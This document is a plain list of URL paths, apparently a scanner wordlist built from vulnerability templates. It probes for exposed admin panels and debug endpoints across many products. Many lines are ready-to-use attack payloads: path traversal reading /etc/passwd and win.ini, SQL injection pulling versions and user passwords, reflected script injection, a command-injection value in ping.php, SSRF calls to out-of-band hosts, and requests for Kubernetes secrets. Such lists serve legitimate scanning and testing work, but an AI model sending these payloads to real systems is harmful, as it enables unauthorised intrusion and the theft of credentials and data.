/solr/
/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true
/wp-admin/tools.php?content=&wp-attachment-export-download=true
/command/prima-factory.cgi
/fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini
/fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini
/verify.php?id=1&confirm_hash=
/mantis/verify.php?id=1&confirm_hash=
/mantisBT/verify.php?id=1&confirm_hash=
/mantisbt-2.3.0/verify.php?id=1&confirm_hash=
/bugs/verify.php?confirm_hash=&id=1
/debug/pprof/
/debug/pprof/goroutine?debug=1
/WealthT24/GetImage?docDownloadPath=/etc/passwd
/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini
/files/ldap.debug.txt
/?patron_only_image=../../../../../../../../../../etc/passwd&patreon_action=serve_patron_only_image
/file?valore=../../../../../windows/win.ini
/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout
/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)
/cmscp/ext/collect/fetch_url.do?url=https://oast.live
/wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd
/components/statestore
/overview
/controlplane
/public/ticket/ajax/ajax.php?action=getContacts&email=%
/../../../../etc/passwd
/lang/log/httpd.log
/setup/setup-datasource-standard.jsp
/param.file.tgz
/admin/lipinadd.asp
/_config
/api/security/ticket
/plug/comment/commentList.asp?id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}user
/cgi-bin/cgibox?.cab
/cgi-bin/cgibox?/nobody
/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd
/?query=SHOW%20DATABASES
/__clockwork/latest
/api/v1/GetSrc
/api/v1/GetDevice
/jbossmq-httpil/HTTPServerILServlet/
/solr//..;/
/wps/proxy
/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd
/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini
/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs
/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs
/wp-content/plugins/wp-statistics/readme.txt
/self.key
/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}
/git/notifyCommit?url={{randstr}}&branches={{randstr}}
/druid/index.html
/api/portalTsLogin/utils/getE9DevelopAllNameValue2?fileName=portaldev_%2f%2e%2e%2fweaver%2eproperties
/v2/auth/roles
/cloudstore/system/#/sys?_k=2lnfbk
/users/sign_in
/fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails
/dgn/dgn_tools/ping.php?ipdm=2;id;
/index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=%27
/pipeline/apis/v1beta1/runs?page_size=5&sort_by=created_at%20desc
/main_details/client.asp
/ADSearch.cc?methodToCall=search
/ajax-api/2.0/preview/mlflow/experiments/get?experiment_id=0
/pub/bscw.cgi/30?op=theme&style_name=../../../../../../../../etc/passwd
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini
/applications.pinpoint
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
/prod-api/druid/websession.html
/admin/
/solr/admin/
/index.php?page=/etc/passwd
/home
/dashboard
/v2/keys/
/hoteldruid/inizio.php
/inizio.php
/upgrade.php
/wifi_base.shtml
/#/alerts
/backend/admin/users?username=anonymous
/query?db=db&q=SHOW%20DATABASES
/Default.aspx
/mongo-express/
/db/admin/system.users
/sensorlist.htm
/data/plugins_listing
/config.json
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
/SSI/Auth/ip_snmp.htm
/hp/device/webAccess/index.htm?content=security
/UserSelect/
/wp-content/themes/CherryFramework/admin/data_management/download_backup.php
/wp-content/plugins/blogroll-fun/blogroll.php?k=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-admin/admin.php?page=wps_pages_page&type=1&ID=1+AND+(SELECT+*+from+(select+SLEEP(6))a)
/?PagePrincipale/rss&id=1%27%3Cscript%3Ealert(document.domain)%3C/script%3E
/api_jsonrpc.php
/api/setup-complete
/nifi-api/access/config
/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method={{randbase(6)}}
/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd
/ccm/system/panels/page/preview_as_user/preview?cID=
/api/v1/userlist?pageindex=0&pagesize=10
/i/?a=logs
/UI/Dashboard
/jackett/UI/Dashboard
/api/v1/terminal/sessions/?limit=10
/lucee/admin/web.cfm
/lucee/admin/server.cfm
/lucees3ezf%3cimg%20src%3da%20onerror%3dalert(
/lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert(
/config/pw_left_bar.html
/#!/printer/Prusa_I3/print
/#/devices
/favicon.ico
/api/v1/namespaces/default/workflows?query=
/RST_status.htm%00currentsetting.htm
/config
/api/v1/status/config
/Portal0000.htm
/cgi-bin/dynamic/config/secure/security.html
/ckfinder/ckfinder.html
